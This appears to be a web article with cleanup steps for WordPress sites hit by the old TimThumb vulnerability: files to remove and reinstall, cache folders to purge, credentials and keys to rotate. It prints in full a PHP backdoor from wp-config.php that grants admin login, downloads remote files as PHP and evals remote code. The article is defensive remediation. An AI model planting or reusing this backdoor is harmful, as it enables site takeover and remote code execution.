Instructions To Cleanup TimThumb Hack in WordPress Site

Cleanup TimThumb Hack

Since, if you remember correctly, there was a security problem with the TimThumb Script in the month of August that was fixed. Although, still to our surprise, many websites are still using the old version. We have fixed four websites so far in the last two months and one being yesterday. Thus, it makes sense to simply write an effective article, so the users can just follow it. All of the four users for whom we have Cleanup TimThumb Hack who didn’t even know that what TimThumb was or whether they were using it or not.

What is TimThumb & How To Cleanup TimThumb Hack?

Cleanup TimThumb Hack

Read More: https://www.binarymoon.co.uk/projects/timthumb

TimThumb is just a PHP script which resizes the images. There was a vulnerability in it, however it is safe to use now. Hence, how do you know that your website is hacked..?? If you see a big red screen on your web browser while visiting your domain:

Cleanup TimThumb Hack

If you start getting bombarded with emails about the users being rerouted from your website. Most likely, the case is that your domain is a victim of this exploit. As a pro-cautionary measure, every users should just use the TimThumb Vulnerability Scanner. Moreover, this will tell you if you are using an older version of TimThumb. Therefore, this plug-in will check if the newer secure version of TimThumb is installed or the older version is installed.

For More Info: https://wordpress.org/plugins/timthumb-vulnerability-scanner

Now, if your website already fell prey to the TimThumb exploit, then here are some instructions for you that what you need to do for Cleanup TimThumb Hack:

  • First of all, you need to remove the following files.
1 /wp-admin/upd.php
2 /wp-content/upd.php
  • Login to the WordPress admin panel and reinstall the version of your WordPress. Specifically, we are looking to reinstall these files.

1 /wp-settings.php
2 /wp-includes/js/jquery/jquery.js
3 /wp-includes/js/110n.js
  • Then after, open your wp-config.php where you will most likely find this malicious code which is harvesting the login credentials and the cookies. This malware code will be towards the bottom.

01 if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
02 if ($_GET['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22'){
03 if ($_GET['pingnow']== 'login'){
04 $user_login = 'admin';
05 $user = get_userdatabylogin($user_login);
06 $user_id = $user->ID;
07 wp_set_current_user($user_id, $user_login);
08 wp_set_auth_cookie($user_id);
09 do_action('wp_login', $user_login);
10 }
11 if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
12 $ch = curl_init($_GET['file']);
13 $fnm = md5(rand(0,100)).'.php';
14 $fp = fopen($fnm, "w");
15 curl_setopt($ch, CURLOPT_FILE, $fp);
16 curl_setopt($ch, CURLOPT_HEADER, 0);
17 curl_setopt($ch, CURLOPT_TIMEOUT, 5);
18 curl_exec($ch);
19 curl_close($ch);
20 fclose($fp);
21 echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
22 }
23 if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
24 $ch = curl_init($_GET['file']);
25 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
26 curl_setopt($ch, CURLOPT_HEADER, 0);
27 curl_setopt($ch, CURLOPT_TIMEOUT, 5);
28 $re = curl_exec($ch);
29 curl_close($ch);
30 eval($re);
31 }}}
  • In your theme’s folder, look for everywhere the TimThumb script may be storing the cached files. Generally, they are in this structure:

1 /wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php
2 /wp-content/themes/themename/temp/cache/external_{MD5Hash}.php
  • Remove everything that look like this. If you are not sure about the things, then eliminate everything which is not an image file.

  • The very next thing that you want to do is to replace the timthumb.php with the newer or latest version that can be found at:

Resource Link: http://timthumb.googlecode.com/svn/trunk/timthumb.php

  • Now, it would be a good idea to alter your passwords starting with your MySQL login information to your WordPress login information. Do not forget to change the password for the MySQL in wp-config.php or you will get the the “Error Establishing Connection” screen.

  • Also, change the secret keys in the wp-config.php files. Moreover, you can generate a new key through going to the online generator.

  • Finally, you are done. Do not forget to empty all the page caching plug-ins. As a cautionary measure, it is good for you to clear your web browsers cookies and cache as well. For the developers, try using the additional image sizes feature in the WordPress in order to replace the TimThumb functionalities.

Important: If your WordPress website is infected by any kind of malware or virus and if you want to Cleanup TimThumb Hack, then you should go through the link http://www.uninstallvirusmalware.com, that will help you to delete nasty malware and viruses from your WordPress domain, Cleanup TimThumb Hack and also protect your site from future virus attack.

Leave a Reply

Your email address will not be published. Required fields are marked *